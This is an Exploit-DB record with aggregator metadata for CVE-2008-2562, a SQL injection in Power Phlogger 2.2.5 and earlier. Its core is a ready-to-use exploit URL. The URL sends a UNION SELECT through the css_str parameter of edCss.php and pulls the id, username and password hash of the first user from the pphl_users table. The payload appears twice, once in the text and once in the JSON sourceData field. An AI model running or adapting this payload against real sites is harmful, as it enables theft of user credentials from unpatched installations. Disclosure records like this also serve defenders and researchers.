Power Phlogger 2.2.5 css_str SQL Injection Vulnerability
2008-06-05T00:00:00
ID EDB-ID:5744 Type exploitdb Reporter MustLive Modified 2008-06-05T00:00:00
Description
Power Phlogger 2.2.5 (css_str) SQL Injection Vulnerability. CVE-2008-2562. Webapps exploit for php platform
############################################################
SQL Injection vulnerability in Power Phlogger
By MustLive (http://websecurity.com.ua)
Detailed information: http://websecurity.com.ua/2158/
Description: SQL Injection vulnerability in Power Phlogger (it is PHP/MySQL logging tool via counters). To make SQL Injection attack you need to be logged into your account, which can be freely obtained via open registration form.
SQL Injection:
http://site/edCss.php?css_str=-1%20union%20select%20null,null,id,username,pw,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20from%20pphl_users%20limit%200,1&action=edit
With this query you will receive id, login and password (hash) of first user.
Vulnerable versions are Power Phlogger <= 2.2.5.
############################################################
# milw0rm.com [2008-06-05]
{"id": "EDB-ID:5744", "hash": "b495cc9c9b93a650f4fe8461e00d6ced", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Power Phlogger 2.2.5 css_str SQL Injection Vulnerability", "description": "Power Phlogger 2.2.5 (css_str) SQL Injection Vulnerability. CVE-2008-2562. Webapps exploit for php platform", "published": "2008-06-05T00:00:00", "modified": "2008-06-05T00:00:00", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/5744/", "reporter": "MustLive", "references": [], "cvelist": ["CVE-2008-2562"], "lastseen": "2016-01-31T23:30:48", "history": [], "viewCount": 3, "enchantments": {"score": {"value": 7.2, "vector": "NONE", "modified": "2016-01-31T23:30:48"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2008-2562"]}], "modified": "2016-01-31T23:30:48"}, "vulnersScore": 7.2}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/5744/", "sourceData": "############################################################\n\nSQL Injection vulnerability in Power Phlogger\n\nBy MustLive (http://websecurity.com.ua)\n\nDetailed information: http://websecurity.com.ua/2158/\n\nDescription: SQL Injection vulnerability in Power Phlogger (it is PHP/MySQL logging tool via counters). To make SQL Injection attack you need to be logged into your account, which can be freely obtained via open registration form.\n \nSQL Injection:\n \nhttp://site/edCss.php?css_str=-1%20union%20select%20null,null,id,username,pw,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20from%20pphl_users%20limit%200,1&action=edit\n \nWith this query you will receive id, login and password (hash) of first user.\n \nVulnerable versions are Power Phlogger <= 2.2.5.\n \n############################################################\n\n# milw0rm.com [2008-06-05]\n", "osvdbidlist": ["45976"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{"cve": [{"lastseen": "2019-05-29T18:09:26", "bulletinFamily": "NVD", "description": "SQL injection vulnerability in edCss.php in PowerPhlogger 2.2.5 and earlier allows remote authenticated users to execute arbitrary SQL commands via the css_str parameter in an edit action.", "modified": "2017-09-29T01:31:00", "id": "CVE-2008-2562", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-2562", "published": "2008-06-06T18:32:00", "title": "CVE-2008-2562", "type": "cve", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}]}